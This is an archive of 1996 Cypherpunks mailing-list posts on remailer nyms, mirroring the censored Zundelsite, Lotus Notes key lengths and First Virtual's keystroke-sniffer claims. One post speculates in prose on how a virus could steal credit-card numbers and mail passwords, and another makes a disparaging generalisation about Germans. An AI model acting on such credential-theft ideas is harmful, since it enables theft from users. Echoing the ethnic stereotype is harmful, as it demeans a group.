 hIwC/nqSW1QDQfUBBACknZMV93wFS2CH0orlgslmEm+alhjI1eKwbbTTmeRWC5Rg
 /S3vZw+95ZuCZfqxKE0XrgZXzOEwfoyBcpVvf9Pb9D19TqEMTmmL/Jpl1xcxmbJ2
 OGsHpQ/TxpazBCVhdBmPblj5wWvwfG1+ZKpIkQ5hiLJhryQM/TUDarEscs3zdaYA
 AAB5231aMcQ74AKoDZizABMF3Tw+olV4mm4jVo9cMn2B3Rj2XBFl4pV9VL3h0ZQB
 cPY/ytBRyZPugr0NpLgjO+q6mEjCcgQrxpYQ+1PvFPdDx1GmJ5ogZqW+AVHsNqAp
 vRoiG8ZhXs4r3E8liFsNtMMf6CUAsdV2ZoX1Hw==
 =Bla3
 -----END PGP MESSAGE-----

Do not actually indent it.  It is indented here because some people's
mailers try to auto-decrypt PGP messages and this is just an example.

Encrypt this with the following public key and mail it to
alias@alpha.c2.org.  Unencrypted mail sent to this address
will be deleted automatically.  If everything is correct, your
mail alias will be created, and you will be sent a confirmation.
If not, there will be no way for the software to reply to you,
so the message will be deleted.  If you don't receive anything,
something is wrong, so try again.  Be sure to test the reply
block first, so that you will know it works!  Also, don't forget
to include the address of the remailer, and the Encrypted: PGP
header at the beginning of your reply block.

Sending in a new reply-block replaces the old one.  To change your
reply-block, just send a new one, using the same format as
the above message.

</QUOTE>

Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 31 Jan 1996 11:39:03 +0800
To: cypherpunks@toad.com
Subject: [NOISY] Your own Zundelsite in five minutes or less
Message-ID: <4l3frc200YUrMxFuFA@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here's how to open your own Zundelsite mirror archive in five minutes or less.

To open your own partial Zundelsite (without the French text or audio
files), first download the 1.3 MB compressed zundelfile from one of the
following URLs:

  ftp://ftp.cs.cmu.edu/afs/cs/user/declan/ftp/zundelsite.tar.gz
  http://joc.mit.edu/mirror/zundelsite.tar.gz
  http://web.mit.edu/afs/athena/contrib/bitbucket2/zundel/zundelsite.tar.gz

Compare against this checksum, that I've also placed in: 
[ftp://ftp.cs.cmu.edu/afs/cs/user/declan/ftp/zundelsite.sum.txt]
 
  MD5 (zundelsite.tar.gz) = 356cdf078f2a155af73a76663e25fe1a
 
Then decompress the zundelfile, untar it, and register your URL with the
Zundelsite Registry at: declan+zundel@andrew.cmu.edu. I'll add your site
to my list of mirrors at:
 
http://www.cs.cmu.edu/afs/cs/user/declan/www/Not_By_Me_Not_My_Views/censorship
.html

As of this afternoon, there are Zundelsite mirrors operating at MIT,
Stanford University, Carnegie Mellon University, the University of
Texas, and the University of Pennsylvania.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 31 Jan 1996 11:40:37 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <9601301545.AA07088@alpha>
Message-ID: <199601310110.UAA26035@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mike M^cNally writes:
> But if by being used to such windows people understand that they're
> not necessarily to be trusted, I don't see why that'd be an attractive
> way of slipping in a trojan horse.  

Well, that "if" is a critical hypothetical. I'm assuming a model in which
people perform most of their legitimate network transactions through Java 
windows. So I think they will be accustomed to typing financial identifiers 
or whatnot into windows labelled "Untrusted Applet Window". Many will
become desensitized to the UAW warning label.

I believe the work on authenticating applet servers to client in terms of
signed Java classes, etc. is the most promising long-term approach.

ObNSB: Although I seem to be cast as an opponent of Java adoption in this
thread, I'm actually a fan of Java and expect to write some Java code RSN. 

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQ7BYSnaAKQPVHDZAQFN9wf5AYOhtNHy2nGvQ7t/SNKy6P9Qay2K4qEY
rMIdtzHBrSpjTHq5HPZSG7YmNhd/trBpH42uUufL+WD+gDj6/amPHDV6kwdmS32d
tS28ECiZlnUidF9+PcaIISuBLiD6g67j9I8KAVdejxg79pTLNFNvjoz22oPZqRq2
PEZI/YXCm7B6J4T6WDauuMKwaMWL78NBe1Udq3o2q2AAUjQfJRkqT4I0hZe2fAEE
mpzNtIOHxDIhRVULEVC1XXPecxyOh/A070knxw3DFGLIL24oCJhODgEG1DKtKqHB
nnt5wYTpO2+vNLuOB14TdRu8fGorctvElu8ozTkrtpDFXoEgZwYVLg==
=96ZK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jan 1996 22:40:55 +0800
To: cypherpunks@toad.com
Subject: Silver Linings and Monkey Wrenches
Message-ID: <ad3416c939021004a79e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:13 AM 1/31/96, Futplex wrote:
>Bill Frantz writes:
>> One other small advantage I can see to using Lotus's crippled encryption.
>> It disguises the fact that a message is actually (double) encrypted with
>> PGP.  Attackers have to break the 40 bits before they see the PGP encrypted
>> data.
>
>I don't understand. Are you saying that there's a special benefit to doing
>superencryption (GAK encryption over non-GAK encryption) when the GAK layer
>is Lotus Notes ?

Maybe what Bill was getting at is that a widely-deployed system of "fairly
good" crypto (a la Clipper/Tessera) could have a silver lining. As many,
many of us have noted for the past several years, if the authorities have
to first jump through hoops (ostensibly), getting court orders, obtaining
the LEAF/LEEF, etc., and only then do they determine that some kind of
superencryption has been added, then this could make things worse for them
than before.

There are of course wrinkles:

-- superencryption could be banned

-- enforcement is problematic, and if there is only a tiny chance of
catching that Fifth Horseman (the Superencryptor), then the penalties would
have to be astronomically high, to satisfy the Basic Equation: (risk of
getting caught) x (penalty if caught) > (payoff of the crime)

-- interoperability. Hard to block it if done in text mode, PGP-style, but
Lotus Notes will presumably be designed to make superencryption harder to
do.

And of course we can never cheer on a mandatory crypto scheme, for a
variety of reasons. I'm just saying that we can look for silver linings, a
way to make lemonade out of lemons.

It may even be possible to nuke these NSA-enabled programs by publicizing
ways of monkeywrenching them, as with superencryption.


--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 31 Jan 1996 11:49:31 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Lotus Notes
In-Reply-To: <199601300743.XAA03525@netcom6.netcom.com>
Message-ID: <199601310113.UAA23562@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz writes:
> One other small advantage I can see to using Lotus's crippled encryption. 
> It disguises the fact that a message is actually (double) encrypted with
> PGP.  Attackers have to break the 40 bits before they see the PGP encrypted
> data.  

I don't understand. Are you saying that there's a special benefit to doing
superencryption (GAK encryption over non-GAK encryption) when the GAK layer 
is Lotus Notes ?

Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Tue, 30 Jan 1996 20:49:44 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: The Big Lie
In-Reply-To: <ukugiD96w165w@bwalk.dm.com>
Message-ID: <199601301215.UAA00311@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <ukugiD96w165w@bwalk.dm.com>, 
  Dr. Dimitri Vulis wrote:
> Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au> writes:
> >
> > I was under the impression that you couldn't libel/slander a dead
> > person. Mainly because libel/slander is a offence against reputation
> > which dead people don't care much for, but also because once you go
> > against this principle where in hell (no pun intended) do you draw the
> > line.
> 
> Where it's convenient to the state. Reportedly in Germany you can easily
> slander dead people, their estates, their descendants, and other members
> of their ethnic group.

Well... how about pets then? Hitler had a pathetic goldfish!

Damn germans. I guess that they really haven't changed a hell of a lot
over the past few decades. No wonder that every other European race
(pretty much) sterotypes them.

Personally I have quite a bit of confidence that my government isn't
going to worry about encryption stuff until technology passes them
by. I am not at all unhappy about this.

--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Tue, 30 Jan 1996 20:44:02 +0800
To: cypherpunks@toad.com
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
In-Reply-To: <9601292041.AA14422@zip_master2.sbi.com>
Message-ID: <199601301216.UAA00325@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <9601292041.AA14422@zip_master2.sbi.com>, 
  David Macfarlane wrote:
> Is this the most transparent media attention grab or what?  FV's
> "Chief Scientist" writes a killer application to destroy
> Internet commerce and it is really only a keystroke capture
> program with a bit of credit card number recognition code tacked
> on.
> 
> I don't think this has any "implications for Internet commerce".
> If you run any number of virus protection programs on your
> computer, and you get your software from reliable sources,
> you never need worry about clandestine number snarfing.

I especially liked the bit about being available under all sorts of
Microsoft OSs but not yet implemented under Unix. (which doesn't in
general *have* APIs or screen savers or all the other guff.

If secure input is needed then it shouldn't be too much of a
problem. I doubt the program would recognize either of INTERCAL input
or output (as a random example)

> I readily admit that there is a larger issue about viruses and
> being able to trust your software, but the presentation from FV
> of this announcement as a "fatal flaw" in internet commerce is
> remarkably disingenuous.  They are really saying, "We have the
> only safe approach" quietly between the lines.

But it's hardly *new* as you say. All in all, a quite convincing
little article. Could almost be worth modifying and posting to the
Germans about something or other.

> And before pm. says it, this has very little to do with
> cryptography.

Or trees.

--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jan 1996 12:45:16 +0800
To: cypherpunks@toad.com
Subject: Re: The FV Problem = A Press Problem
Message-ID: <ad341d2f3a0210042863@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan has written a very nice essay, most of which I agree with fully.
However, there is one item that I have a different angle on:

At 12:41 AM 1/31/96, Jonathan Rochkind wrote:

>It will undermine their credibility among cypherpunks for a long time,
>certainly.  Maybe even among the net--but among the vast majority of the
>public?  It's possible that as "among the net" grows to include
>increasingly more of the 'the public',  things will change.  But at
>present, I don't think things will have changed yet.  The FV propaganda
>will probably net good results for FV,  although not among cypherpunks.
....
>Most people aren't equipped with the knowledge to tell that this was a
>'fluff' piece, not meriting a full page story.  In fact,  most people rely
>on newspapers themselves to make these sorts of determinations for
>them--what topics are seriously important and newsworthy, and what topics
>aren't.  Which is why companies can be so succesful when they can use press
>releases to influences what shows up in the news.   Generally, press
>releases aren't seen by the majority of the public, so they don't realize
>that a story is taken directly from a press release.  Most papers use
>press releases to write stories--maybe not the NYT, but most local papers.
>And most people either don't realize it, or don't care.

Here's my different angle on this: I'm not so sure there even _is_ a
"public" on stories like this. Certainly my brother won't read about this,
nor my sister, nor my parents, nor most of my neighbors.

As with political stories that are read mostly by people interested in
politics, I'm sure that most potential readers of the "First Virtual" story
either skipped right past it or skimmed it lightly. No doubt the FUD of
this story, and the FUD of earlier stories about Internet weaknesses,
random number attacks, etc., left a vaguely feeling in these casual readers
that all is not right with Internet commerce.

But, having said this, I wouldn't underestimate the effects of a group such
as ours lose respect for First Virtual, Nathaniel Borenstein, and Simson
Garfinkel, to the extent we have. We'll be the sorts who keep the story
going, who talk to other journalists, and who make decisions for our
companies on what products and strategies to use.

The "public" has probably already forgotten the story; we have not.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 31 Jan 1996 13:26:48 +0800
To: cypherpunks@toad.com
Subject: Kill this message too (FV NOISE NOISE NOISE)
Message-ID: <199601310439.UAA10063@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The size of my killfile has increased dramatically in the last
couple of days.  Can we start talking about something crypto
related?

--MegaBozo







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 31 Jan 1996 23:29:06 +0800
To: shamrock@netcom.com
Subject: Re: Lotus Notes
Message-ID: <9601310149.AA18887@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>So from who did Lotus license RC4?

RSA, of course.  I don't know the arrangements of RSA's license with
Lotus, of course, but where did someone say that RSA mandated the
keylength that Lotus uses?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Wed, 31 Jan 1996 22:35:40 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: KOH "Helpful" Crypto Virus
In-Reply-To: <v02120d09ad34770c9b3f@[192.0.2.1]>
Message-ID: <Pine.LNX.3.91.960130212931.12686A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> While you are at it, you might also want to pick up their famous collection
> CD-ROM full of virus code, live viruses, virus creation engines, etc. From
> their catalog: "For starters, you get a fantastic virus collection
> consisting of 574 families [...] about 3700 carefully tested and cataloged
> viruses in all...$99 + $5 S&H.
> 

I take it its completely legal to set up a Virus ftp site then?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bruce@aracnet.com (Bruce Baugh)
Date: Wed, 31 Jan 1996 08:57:50 +0800
To: cypherpunks@toad.com
Subject: Reply Blocks and Nyms: newbie question
Message-ID: <310e8f92.2746553@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm almost certainly going to be changing my address in the next few
weeks. I'd like to keep the same nym account. Can someone take a stab
at explaining how to feed the relevant info to C2?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Wed, 31 Jan 1996 22:38:27 +0800
To: rsalz@osf.org
Subject: Re: Lotus Notes
In-Reply-To: <9601310019.AA18345@sulphur.osf.org>
Message-ID: <9601310246.AA14482@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: Rich Salz <rsalz@osf.org>
   Date: Tue, 30 Jan 1996 19:19:13 -0500
   Cc: cypherpunks@toad.com
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   >I find this very interesting. RSA prohibits its licencees from using RSA
   >software with truly secure keylenghts.

   Hunh?  I could find no mention of keylength or keysize in the RSAREF
   documents I had around.  I'm at home now, but I also recall no mention
   of keysize or keylength in the license OSF has, either.

In RSAREF 2.0 this is covered by clause 2(d) in the license:

     d.   Prior permission from RSA in writing is required for any
          modifications that access the Program through ways other
          than the published Program interface or for modifications
          to the Program interface. RSA will grant all reasonable
          requests for permission to make such modifications.

The published interface references the following constants in source/rsaref.h:

/* RSA key lengths.
 */
#define MIN_RSA_MODULUS_BITS 508
#define MAX_RSA_MODULUS_BITS 1024
#define MAX_RSA_MODULUS_LEN ((MAX_RSA_MODULUS_BITS + 7) / 8)
#define MAX_RSA_PRIME_BITS ((MAX_RSA_MODULUS_BITS + 1) / 2)
#define MAX_RSA_PRIME_LEN ((MAX_RSA_PRIME_BITS + 7) / 8)

As part of the agreements leading to the release of MIT PGP 2.6 we
received explicit permission from RSADSI to increase
MAX_RSA_MODULUS_BITS to 2048.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 30 Jan 1996 19:36:17 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <4l3Iox2Mc50eMWY=8n@nsb.fv.com>
Message-ID: <199601301058.VAA09911@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Nathaniel Borenstein <nsb@nsb.fv.com>
  and cypherpunks@toad.com, Peter Monta <pmonta@qualcomm.com>
 
NSB wrote:
> Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Peter
> Monta@qualcomm.com (651*)
...
> > > NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.
> 
> > Never speak it either.  Walls (and audio peripherals) have ears.
> 
> When you can give me a cheap device that can be planted in the wall,
> listen to everything you say, and just spit out the credit card numbers,
> then I'll start to be worried about speaking it.  
...

And in a later post:

...
> I used to trust the telephone not to be tapped in a selective way based
> on keyword recognition, but in recent years, with the improvement in
> voice recognition technology, I have stopped trusting it that way, and I
> know plenty of other people have too -- if you say "NSA" into a cellular
> call, you are probably inviting an eavesdropper.
...

So, what's wrong with the virus listening through the audio card?

Many people have their phone close to their computer, and credit-card
numbers spoken over the phone are usually spoken clearly.

> Similarly, we trust the postal service and certain uses of email not to
> be free of any insecurities, but to be hard to defeat in a large scale
> automated way.
...

Presumably mail from FV asking for confirmation wouldn't be too hard
to search for - I guess one would watch WinSock for connection
to the POP port then grab the password etc, followed by periodically 
checking for new e-mail (without the user's knowledge).


Many people would already have their CC number on the computer somewhere,
in a letter they wrote (and later printed out and posted). If it's a virus,
it doesn't even need a net connection to communicate it back (it can just
remember it and pass it 'home' several infections later).

The real problem ain't the net, but lousy security in home systems.


(Hmm, with the sound cards, couldn't the virus just hypnotise the user....)


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMQ35nCxV6mvvBgf5AQF6YQQAn4G7Ks+3Tbdc5k5t1Y3H1y6xTYtdQEyS
rpespy10GEqCV1QY7LSHSkqqDDfR3Mdx6dlLIMv+gyay9gz5jFp0IKBweWvNfGDr
iJa7EiE+6sHt9lR0pjDcL9MGca1cdzOvwZYX6wGoC3JPZBmgFbM7YYv/EYum63TH
CwsAkgA2hAk=
=2UHy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 31 Jan 1996 22:36:06 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Lotus Notes
In-Reply-To: <9601310246.AA14482@toad.com>
Message-ID: <199601310315.WAA26299@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


bal quoted from the RSAREF 2.0 license:
> /* RSA key lengths.
>  */
> #define MIN_RSA_MODULUS_BITS 508
> #define MAX_RSA_MODULUS_BITS 1024
> #define MAX_RSA_MODULUS_LEN ((MAX_RSA_MODULUS_BITS + 7) / 8)
> #define MAX_RSA_PRIME_BITS ((MAX_RSA_MODULUS_BITS + 1) / 2)
> #define MAX_RSA_PRIME_LEN ((MAX_RSA_PRIME_BITS + 7) / 8)

Unfortunately this still doesn't explain Charlie Kaufman's comment 
(paraphrased) that the "crypto software also limited us to 760 bit RSA keys".

Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Wed, 31 Jan 1996 14:33:26 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601310616.WAA04463@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Farce Virtual has discovered that some persons using the
Internet are not using the names they were born with. We
made this discovery in the wake of criticism of our
discovery of keyboard sniffing programs, a major discovery
we were able to get several reporters to write about.

We consider our latest discovery to signal the imminent
death of Usenet as we know it.

We are taking the unusual step of announcing our discovery
to the world, and in a simultaneous series of articles in
major newspapers, to alert the world to our discovery.

Farce Virtual provides the only reliable solution to this
problem. We do not use in encryption, because many of our
customers say it is too hard to understand. Instead, we
rely on the oldest method in the book: fear, uncertainty,
and doubt. We have invented a new term for this: FUD.

``Using the FUD Factor line of products, our customers are
protected from those who are not using the names that God
gave them,'' said Nathaniel Boringsternlight, Farce
Virtual's chief publicist.

Asked about women on the Net who are using their married
names, Mr. Boringsternlight added, ``It was to deal with
married women that I invented Safe-Tickle.'' No further
explanation of this comment was offered.

There's simply no other way to keep your sanity safe on the
net. The program we have demonstrated completely undermines
the sanity of all known users of the Internet.

--------


Nathaniel Boringsternlight <nsb@fvh.fud>
Chief Publicist, Farce Virtual Holdings
FAQ & PGP key: nsb+faq@fvh.fud






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Wed, 31 Jan 1996 20:14:43 +0800
To: Jonathon Fletcher <jonathon@pobox.com>
Subject: NOISE: Cypher-list noise levels! >>>>
In-Reply-To: <199601310201.VAA26901@pobox.com>
Message-ID: <Pine.LNX.3.91.960130225132.16003A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


>   Can someone on the PGPdomo cypher-list tell me how good the signal to
> noise ratio currently is, and how good the content is. I've not signed
> up, but I'm tempted to try and get away from the noise on here
> recently.
> 

I thought I'd contribute some noise to the cypherpunks list too, so here
goes. Why not just subscribe to the PGPdomo list, and see what the 
traffic is like for a couple days? Its not like you will be locked into 
the mailing list forever.

FYI the traffic on the PGPdomo list has been very low lately. I haven't
received a message from the list in a few days. But then again there is
even more 'noise' on that list because every message I've seen posted on
it talks about PGPdomo, the mailing list, getting PGP software to work,
etc.. From what I've seen people just sign up to test it out with a test
message, and thats about it. Even with mkpgp for pine its still a bit
inconvenient to use, I think thats the reason for the low-traffic.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 31 Jan 1996 15:25:58 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISY] Your own Zundelsite in five minutes or less
In-Reply-To: <v02120d02ad34bb4854c5@[192.0.2.1]>
Message-ID: <Pine.ULT.3.91.960130225229.27647E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Jan 1996, Lucky Green wrote:

> At 19:55 1/30/96, Declan B. McCullagh wrote:
> 
> >As of this afternoon, there are Zundelsite mirrors operating at MIT,
> >Stanford University, Carnegie Mellon University, the University of
> >Texas, and the University of Pennsylvania.
> 
> I am really interested what the German government is going to do next.
> Force their universities to dismount AFS?

No. They seem to be trying to pretend that the mirror sites don't exist.
They did recently get the universities that weren't served by DT to block 
webcom.com.

> How can we best get the fact the their censorship efforts have hit *the
> wall* to their attention? Any Germans on this list that can file a
> complaint against the sites with the German authorities? What about
> contacting German Telekom?

This has all been done. First Declan sent an open letter to DT, then a 
half dozen white supremacist groups sent similar "demands."

I think it's reasonable to wait a day for their response. At the moment, 
there is effectively no censorship.

> We won't have won until they restore the routes to Webcom.

Here I have trouble with the word "we," and what we're trying to 
accomplish. 

Censorship has clearly lost. Germany is simply not going to block 
stanford.edu, cmu.edu, mit.edu, upenn.edu, aol.com, and so on, not to 
mention AFS.

I do not believe that the battle to get people to read and care about 
Zundel himself is ours.

I'm happy to wait a day or two for the routes to webcom.com to be
restored. If after two days they haven't been, then it's time to press 
again. 

I do not want to allow the Nazis to associate themselves with "us." 
Please see article <DM0Fsn.5GC@freenet.carleton.ca> for a little on what 
they're trying to claim credit for. Note they are calling for mirror 
sites nearly three days after they popped up, with no involvement on 
their part whatsoever.

I ain't no part of no Aryan Vanguard. I say proclaim victory now.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 31 Jan 1996 15:20:19 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Lotus Notes
Message-ID: <199601310705.XAA09848@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:13 PM 1/30/96 -0500, Futplex wrote:
>Bill Frantz writes:
>> One other small advantage I can see to using Lotus's crippled encryption. 
>> It disguises the fact that a message is actually (double) encrypted with
>> PGP.  Attackers have to break the 40 bits before they see the PGP encrypted
>> data.  
>
>I don't understand. Are you saying that there's a special benefit to doing
>superencryption (GAK encryption over non-GAK encryption) when the GAK layer 
>is Lotus Notes ?

Tim May had it exactly right in his post entitled "Silver Linings and
Monkey Wrenches" (thanks Tim).  The only thing I can add is that forcing
them to attack a 40 bit key is better than giving them the whole key thru
some LEAF scheme ala Clipper.

As long as you can cut and paste, PGP (at least the Mac version) is hard to
lock out and minimally usable.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jan 1996 15:37:23 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISY] Your own Zundelsite in five minutes or less
Message-ID: <v02120d04ad34c75729c7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:07 1/30/96, Rich Graves wrote:
[...]
>> We won't have won until they restore the routes to Webcom.
>
>Here I have trouble with the word "we," and what we're trying to
>accomplish.
>
>Censorship has clearly lost. Germany is simply not going to block
>stanford.edu, cmu.edu, mit.edu, upenn.edu, aol.com, and so on, not to
>mention AFS.

But they succeeded in blocking Webcom. Until the block is removed, we
haven't won. Do 'we' agree that the block should be removed?

>I do not believe that the battle to get people to read and care about
>Zundel himself is ours.

Amen. I just wished that the people who's names mark some of the milestones
in the fights for our rights (i.e, Miranda, as in Miranda Rights) were
people whose causes I can support. Having seen concentration camps, I can
not possibly sympathize with Mr. Zündel's views. But he still has a right
to free speech. If he loses it, we lose it. It all comes down to this:


                First they came for the Communists,
                  and I didn't speak up,
                    because I wasn't a Communist.
                Then they came for the Jews,
                  and I didn't speak up,
                    because I wasn't a Jew.
                Then they came for the Catholics,
                  and I didn't speak up,
                    because I was a Protestant.
                Then they came for me,
                  and by that time there was no one
                    left to speak up for me.

                by Rev. Martin Niemoller, 1945.

[...]

>I do not want to allow the Nazis to associate themselves with "us."
>Please see article <DM0Fsn.5GC@freenet.carleton.ca> for a little on what
>they're trying to claim credit for. Note they are calling for mirror
>sites nearly three days after they popped up, with no involvement on
>their part whatsoever.

I can imagine what they wrote. "The world is supporting our cause...." No,
I do not support their cause. I despise their cause. And I still support
their rights.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 31 Jan 1996 20:14:26 +0800
To: John Young <jya@pipeline.com>
Subject: Re: NRO Slush Fund
In-Reply-To: <199601301329.IAA18155@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SV4.3.91.960130234058.27563D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Am I remembering correctly that the NRO slush came to light, becasue the 
bigwigs were caught building a Taj Mahal of a headquarters building with 
the extra money? Oh, the banality of it!

They should have been been surveilling Amercian's listening habits to see 
who's a fan of Frank Zappa, it would have made for more sensational 
reading on the CP list.

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 31 Jan 1996 13:38:23 +0800
To: "David G. Koontz" <koontz@MasPar.COM>
Subject: Re: NRO Slush Fund
In-Reply-To: <9601301925.AA04344@argosy.MasPar.COM>
Message-ID: <Pine.SV4.3.91.960130235502.27563G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> Sad to think that the undersecretary for defense who used to have
> oversight of the NRO.......


    As we say in the trenches, "Fuck up and move up".

   It's a corollary to, "No good deed goes unpunished"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Wed, 31 Jan 1996 20:18:46 +0800
To: cypherpunks@toad.com
Subject: NOISE: Borenstein's Fatal Spam (Was: Plonk, Dr. Fred)
Message-ID: <Pine.3.89.9601302323.A8042-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


please don't try to make sensible replies to this type of tar-baby
garbage.  What's the point in arguing with someone who only wants 
you to argue with them and make sure you spell their name right?

First Virtual, you lost a lot of ground with me.
(sounds like others feel the same way, too).

... that sucking sound is your reputation capital being
snarfed off your keyboard and encrypted by tempest-bots
lurking just under your tinfoil helmet.  I'd be worried.

The corrupted keyboard buffer of 
"W. Kinney" <kinney@bogart.Colorado.EDU> wrote: 
 . . .
> Followed by an hysterical essay on how FV has "discovered" the keyboard
> sniffer. Oh, please. You people should be ashamed of yourselves.

To which FV's own replied:

I trust you've seen by now that we made no claim to have discovered
keyboard sniffers.  Please read our claims more carefully, and I'd be
delighted to discuss them rationally.  -- Nathaniel
